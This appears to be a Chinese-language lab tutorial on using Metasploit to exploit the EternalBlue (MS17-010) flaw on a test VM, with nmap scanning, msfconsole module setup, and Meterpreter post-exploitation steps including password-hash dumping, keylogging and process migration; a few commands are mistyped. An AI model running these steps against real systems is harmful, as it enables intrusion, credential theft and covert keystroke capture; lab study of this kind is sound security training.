what
Metasploit(通常简称为MSF)是一个开源的渗透测试框架,包含大量的已知漏洞利用模块,可以用来攻击目标系统并获取控制权。
how
实验环境:Kali、带有永恒之蓝漏洞的虚拟机且开启445端口(两个虚拟机同一子网)
1.信息收集
1.1查找Kali同一网段内的存活主机namp -sP 网段
namp--script-vlnu 网段
1.2检验目标主机是否有漏洞以及端口开放情况
查看漏洞&开放端口:nmap --script-vuln ip
2
msfconsole
是 Metasploit 框架的交互式命令行界面,也是 Metasploit 框架最常用的用户界面之一。通过 msfconsole
,用户可以访问和使用 Metasploit 提供的各种功能和模块,包括漏洞利用(exploits)、有效载荷(payloads)、辅助模块(auxiliary modules)、编码器(encoders)和后期利用(post-exploitation)模块等。
2.1
msfconsole
2.2
search <利用漏洞代号> ---查询msf是否有该漏洞能利用
use 0 ----使用第一个利用漏洞机制进入该模块 --自动进入--》
msf6 exploit(windows/smb/ms17_010_eternalblue) > 模块
show options ---查看参数
ps:这里的源IP以及默认填上了Kali IP 其他参数默认不用改 只需要填写目的ip(漏洞主机IP)
set rhost 目标IP
3
所有参数配置完毕 利用的模块启动 --->run/exploit
Meterpreter 是 Metasploit 框架中一个非常强大的后渗透工具,不但完全getshell同时本身也有很多功能去进一步利用目标主机
ps:Linux与Windows间的字符编码会不统一,会出现乱码
解决乱码问题---chcp 65001
多提一嘴msf框架的关系图类比Linux---gpt告诉我的
Metasploit 框架(msf6) Linux 操作系统
+-------------------+ +-------------------+
1 | 渗透测试平台 | | 操作系统 |
+-------------------+ +-------------------+
| |
v v
利用模块(exploit module) 可执行程序或脚本
+-------------------------------+ +-------------------------------+
2 | 特定漏洞利用代码 | | 运行在系统上的程序或脚本 |
+-------------------------------+ +-------------------------------+
| |
v v
Meterpreter Shell/终端会话
+---------------------------+ +---------------------------+
3 | 高级后渗透测试工具 | | 系统交互界面 |
+---------------------------+ +---------------------------+
2--->3 run/exploit
3--->2 background
并且框架内是有会话概念的,msf不单单可以管理一个会话 可以use切换
4 后渗透模块自带的功能
run windows/gather/smart_hashdump---收集用户名密码
ps ---查看被攻击主机当前运行进程
将键盘记录与浏览器进程相绑定--------------
keyscan_start:开启键盘记录功能
keyscan_dump:显示捕捉到的键盘记录信息
keyscan_stop:停止键盘记录功能
migrate id ---进程迁移
getpid--- 查看我们当前的进程id
keyscan_dump:显示捕捉到的键盘记录信息
还有好多用法大家可以参考这个🔗
MSF使用详解-安全客 - 安全资讯平台 (anquanke.com)